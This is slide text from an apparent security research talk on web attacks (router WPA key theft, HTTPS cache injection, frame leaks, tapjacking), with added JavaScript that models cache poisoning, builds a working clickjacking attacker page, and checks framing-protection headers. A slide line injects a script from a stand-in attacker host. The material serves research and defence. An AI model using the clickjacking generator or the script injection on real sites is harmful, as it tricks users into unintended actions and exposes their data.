Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Stanford University
Bad memories
http://ly.tl/t9
1. Find a design flaw
2. Exploit an implementation vulnerability
3. Make it irrelevant (focus of this talk)
Irrelevant?
Secure protocol
Side channel
Outline
Breaking into a WPA network with a web page
Attacking HTTPS with cache injection
Stealing private data with frame leak attacks
Owning a phone with clickjacking on steroids
WEP
WPA
Some routers
Ads poisoning
http://blog.avast.com/2010/02/18/ads-poisoning--jsprontex
Same origin policy: a page on http://evil.com can POST a request to http://mail.google.com, but it cannot read the response.
[Diagram: the attacker's page, served from the Internet, probes the victim's LAN for common gateway addresses such as 192.168.1.1 and 192.168.2.1.]
The same origin policy prevents us from knowing what kind of authentication the router uses.
Firefox vulnerabilities
192.168.2.1:1372
Brand A Model XY
<script src=http://badguy.com/script.js/>
No XSS? No problem!
Use the clickjacking drag-and-drop attack by P. Stone! 8/8 router brands are vulnerable to clickjacking.
There is an app for that!
Wi-Fi SSID: Victim
MAC address: E2:54:D7:1A
Geolocation lookup request carrying the access point's MAC address and SSID (the wifi_towers field):
{ "host" : "Test", "radio_type" : "unknown", "request_address" : true, "version" : "1.1.0", "wifi_towers" : [ { "mac_address" : "E2:54:D7:1A", "ssid" : "Victim" } ] }
The Plan
Browser caching
[Diagram: the browser requests the .html page and the .js it references; the .js is stored in the browser cache and reused on later loads.]
43% of the Alexa top 100,000 web sites use at least one external javascript library
Attack scenario
[Diagram: the attacker injects a malicious copy of a shared external .js, which the browser caches.]
Later...
[Diagram: the victim opens a site whose .html includes the same .js; the browser serves the poisoned copy from its cache.]
Widely shared external scripts: jQuery, Google Analytics
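The attack scenario above, as an added example that is not part of the talk: a toy JavaScript model of a browser cache keyed by full URL. A backdoored library is stored once with a ten-year freshness lifetime and, a month later, served into an HTTPS page that still embeds the library over http://; the same page referencing https:// misses the poisoned entry because the scheme is part of the cache key. The hosts cdn.example and bank.example, the script bodies and the timestamps are constructed for illustration, and the freshness logic models only Cache-Control: max-age and Expires.

```javascript
// Added example (not from the talk): a toy model of a browser HTTP cache, used to
// show why a script injected once on an untrusted network can survive and later
// run inside an HTTPS page that still embeds the library over http://.
// URLs, script bodies and timestamps are constructed for illustration.

// Freshness lifetime in seconds from the response headers. Only
// Cache-Control: max-age and Expires are modelled; anything else yields 0.
function freshnessLifetime(headers, responseTime) {
  const lower = {};
  for (const [k, v] of Object.entries(headers)) lower[k.toLowerCase()] = String(v);
  const m = /max-age=(\d+)/i.exec(lower['cache-control'] || '');
  if (m) return Number(m[1]);
  if (lower['expires']) {
    const exp = Date.parse(lower['expires']);
    if (!Number.isNaN(exp)) return Math.max(0, (exp - responseTime) / 1000);
  }
  return 0;
}

// The cache is keyed by the full URL, scheme included: http://x/a.js and
// https://x/a.js are different entries.
class BrowserCache {
  constructor() { this.entries = new Map(); }
  store(url, headers, body, now) {
    const lifetime = freshnessLifetime(headers, now);
    if (lifetime > 0) this.entries.set(url, { body, expiresAt: now + lifetime * 1000 });
  }
  lookup(url, now) {
    const e = this.entries.get(url);
    return e && now <= e.expiresAt ? e.body : null;
  }
}

// Script URLs referenced by a page (a simple regex is enough for this model).
function scriptSrcs(html) {
  const out = [];
  const re = /<script[^>]*\ssrc=["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Mixed content: scripts that an https:// page pulls in over plain http://.
function mixedContentScripts(pageUrl, html) {
  if (!pageUrl.startsWith('https://')) return [];
  return scriptSrcs(html).filter(src => src.startsWith('http://'));
}

// Resolve each script of a page from the cache when fresh, else from the network.
function loadPageScripts(cache, html, now, fetchFromNetwork) {
  return scriptSrcs(html).map(src => {
    const cached = cache.lookup(src, now);
    return { src, fromCache: cached !== null, body: cached === null ? fetchFromNetwork(src) : cached };
  });
}

function runScenario() {
  const cache = new BrowserCache();
  const LIB = 'http://cdn.example/jquery.min.js';   // hypothetical shared library URL
  const DAY = 86400 * 1000;
  let now = Date.parse('2010-07-01T12:00:00Z');

  // 1. The attacker answers the plain-HTTP request for the library with a
  //    backdoored copy and a ten-year freshness lifetime; the browser caches it.
  cache.store(LIB, { 'Cache-Control': 'public, max-age=315360000' }, 'evil();', now);

  // 2. A month later the victim opens an HTTPS site whose page still embeds the
  //    library over http://. The poisoned copy is served from the cache.
  now += 30 * DAY;
  const page = '<html><script src="' + LIB + '"></script></html>';
  const pageUrl = 'https://bank.example/';            // hypothetical HTTPS site
  const genuine = () => 'genuine();';                 // what the network would return
  const loaded = loadPageScripts(cache, page, now, genuine);

  // 3. The same page referencing https://cdn.example misses the poisoned entry,
  //    because the scheme is part of the cache key.
  const safePage = page.replace('http://cdn.example', 'https://cdn.example');
  const loadedSafe = loadPageScripts(cache, safePage, now, genuine);

  return {
    mixed: mixedContentScripts(pageUrl, page),
    poisoned: loaded[0].fromCache, poisonedBody: loaded[0].body,
    safeMixed: mixedContentScripts(pageUrl, safePage),
    safeFromCache: loadedSafe[0].fromCache, safeBody: loadedSafe[0].body,
  };
}
```

Running runScenario() gives poisoned: true with the injected body for the http:// reference and a cache miss for the https:// one; mixedContentScripts is the check a site owner can run on its own pages, since an HTTPS page that loads any script over http:// hands the attacker this replay.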
https://twitter.com
[Chart: Comodo / Firefox study on site identity indicators; values shown: 9%, 3.4%, 1.4% (Mozilla)]
What about tricking the browser so it doesn't display the standard warning?
IE standard warning
IE: demo
Firefox challenge
Clickjacking 101
Clickjacking history
id=checkbox-29
leftScroll: 0, topScroll: 10
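The slide locates the target control by its element id and by scroll offsets. As an added example (not code from the talk), the JavaScript below computes that geometry: where to place a clipping div on the attacker page, how far to scroll the transparent iframe inside it so that the control sits under the decoy button, where a click on the decoy lands in the framed page, and the attacker page that results. The target URL, element id, coordinates and sizes are constructed.

```javascript
// Added example (not from the talk): the geometry of a classic clickjacking
// overlay. The attacker page draws a decoy button; above it sits a transparent
// clipping div holding an iframe of the target, scrolled so that one control of
// the target (located, as on the slide, by its id and scroll offsets) lies exactly
// under the decoy. URL, element id, coordinates and sizes are constructed.

// Position and size of the target control inside the framed page (CSS pixels);
// an attacker measures these once in a browser.
const TARGET = { url: 'http://target.example/settings', elementId: 'checkbox-29',
                 left: 340, top: 210, width: 18, height: 18 };

// Where the decoy button is drawn on the attacker page.
const DECOY = { left: 120, top: 80 };

// Size given to the iframe; it must extend past the control or the clipping
// div cannot be scrolled far enough.
const FRAME = { width: 1000, height: 800 };

// The clipping div (overflow:hidden) is placed at the decoy and sized to the
// control; scrolling it by the control's own coordinates moves the control to
// the div's top-left corner, i.e. onto the decoy.
function overlayGeometry(target, decoy, frame) {
  if (target.width <= 0 || target.height <= 0) throw new Error('control has no size');
  if (target.left + target.width > frame.width || target.top + target.height > frame.height) {
    throw new Error('iframe too small to scroll the control into view');
  }
  return {
    viewport: { left: decoy.left, top: decoy.top, width: target.width, height: target.height },
    scroll: { left: target.left, top: target.top },
  };
}

// Map a click on the attacker page to the point it reaches in the framed page,
// or null when the click falls outside the clipping div.
function clickLandsAt(target, decoy, frame, clickX, clickY) {
  const { viewport: v, scroll } = overlayGeometry(target, decoy, frame);
  const inside = clickX >= v.left && clickX < v.left + v.width &&
                 clickY >= v.top && clickY < v.top + v.height;
  if (!inside) return null;
  return { x: scroll.left + (clickX - v.left), y: scroll.top + (clickY - v.top) };
}

// Does a point in the framed page fall on the target control?
function hitsControl(target, point) {
  return point !== null &&
         point.x >= target.left && point.x < target.left + target.width &&
         point.y >= target.top && point.y < target.top + target.height;
}

// Attacker page as HTML. opacity:0 keeps the iframe clickable (visibility:hidden
// or display:none would not), and z-index puts the clip above the decoy.
function buildClickjackPage(target, decoy, frame) {
  const { viewport: v, scroll } = overlayGeometry(target, decoy, frame);
  return [
    '<!doctype html><html><body>',
    `<!-- overlay aims at #${target.elementId} of ${target.url} -->`,
    `<button style="position:absolute;left:${v.left}px;top:${v.top}px;width:${v.width}px;` +
      `height:${v.height}px;z-index:1">Play</button>`,
    `<div id="clip" style="position:absolute;left:${v.left}px;top:${v.top}px;width:${v.width}px;` +
      `height:${v.height}px;overflow:hidden;opacity:0;z-index:2">`,
    `<iframe src="${target.url}" scrolling="no" style="border:0;width:${frame.width}px;` +
      `height:${frame.height}px"></iframe>`,
    '</div>',
    '<script>',
    `var c=document.getElementById("clip");c.scrollLeft=${scroll.left};c.scrollTop=${scroll.top};`,
    '</script>',
    '</body></html>',
  ].join('\n');
}
```

With these constructed values, a click on the centre of the decoy (129, 89) reaches (349, 219) in the framed page, inside the 18x18 checkbox; a click one pixel left of the decoy never enters the iframe. The geometry is the reason framing itself, not any particular element, is what a site has to refuse.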
Vulnerability fixed
Facebook updated their clickjacking defense: they no longer display your info behind the black div.
http://ly.tl/t1
Phone usability
Phone browsers provide specific usability features. These features give the attacker complete control.
Session handling
Desktop browsers discard session cookies when closed; mobile browsers don't. Non-session cookies tend to live longer on mobile sites.
Phishing demo
Tapjacking
Tapjacking ?
[Charts: regular sites vs. mobile sites, Alexa Top 10 / Top 100 / Top 500, y axis 0% to 75%]
Tapjacking demo: Twitter demo
Vulnerability fixed
Conclusion
WPA key can be stolen from a web page
Wi-Fi network can be geo-localized within 500 meters
Break the same origin policy via frame leak attack
Tapjacking: clickjacking on steroids for smartphones
Mobile sites must prevent framing!
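An added example, not part of the talk, for the last point: a JavaScript checker that classifies the framing protection a response declares (X-Frame-Options, which existed when the talk was given, and the later CSP frame-ancestors directive), a pure-function form of the script-based frame-busting decision, and a survey helper that reports what fraction of a set of responses can be framed, which is the measurement behind the regular-vs-mobile charts. The sample responses and site names are constructed.

```javascript
// Added example (not from the talk): classify the framing protection a site
// sends, and survey a set of responses for sites that can be framed (and so
// tap-jacked). Header samples and site names below are constructed.

// Normalise a header map to lower-case names.
function lowerHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = String(v).trim();
  return out;
}

// Framing policy declared by a response. A CSP frame-ancestors directive (the
// later standard) takes precedence; otherwise X-Frame-Options is used.
// framable: true (no policy), false (denied), 'same-origin' or 'listed-origins'.
function framingPolicy(headers) {
  const h = lowerHeaders(headers);
  const csp = h['content-security-policy'] || '';
  const fa = /(?:^|;)\s*frame-ancestors\s+([^;]+)/i.exec(csp);
  if (fa) {
    const sources = fa[1].trim().toLowerCase();
    if (sources === "'none'") return { framable: false, by: 'csp', value: sources };
    if (sources === "'self'") return { framable: 'same-origin', by: 'csp', value: sources };
    return { framable: 'listed-origins', by: 'csp', value: sources };
  }
  const xfo = (h['x-frame-options'] || '').toUpperCase();
  if (xfo === 'DENY') return { framable: false, by: 'x-frame-options', value: xfo };
  if (xfo === 'SAMEORIGIN') return { framable: 'same-origin', by: 'x-frame-options', value: xfo };
  if (xfo.startsWith('ALLOW-FROM')) return { framable: 'listed-origins', by: 'x-frame-options', value: xfo };
  return { framable: true, by: null, value: null }; // no declared policy: anyone may frame it
}

// The decision an in-page frame-busting script makes, written over a
// window-like object so it can be exercised outside a browser:
//   if (self == top) show the page, else navigate top to our own location.
// Script-only busting is weaker than a header, because the attacker controls
// the parent document.
function frameBustDecision(win) {
  if (win.self === win.top) return { action: 'show' };
  return { action: 'bust', navigateTopTo: win.self.location };
}

// Fraction of responses that declare no framing policy at all.
function framableFraction(responses) {
  if (responses.length === 0) return 0;
  const open = responses.filter(r => framingPolicy(r.headers).framable === true).length;
  return open / responses.length;
}

// Constructed sample: a mix of protected and unprotected (mobile-style) sites.
const SAMPLE = [
  { site: 'a.example',   headers: { 'X-Frame-Options': 'DENY' } },
  { site: 'b.example',   headers: { 'x-frame-options': 'sameorigin' } },
  { site: 'c.example',   headers: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" } },
  { site: 'm.d.example', headers: { 'Content-Type': 'text/html' } },
  { site: 'm.e.example', headers: { 'Set-Cookie': 'sid=abc; Path=/' } },
];
```

framableFraction(SAMPLE) is 0.4 for the constructed set: the two mobile-style sites without any header are the ones a tapjacking page can load in a frame. Header names are matched case-insensitively because real servers send them in mixed case, and the value comparison for X-Frame-Options is case-insensitive for the same reason.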
For the videos and the latest version of the slides go to http://ly.tl/t9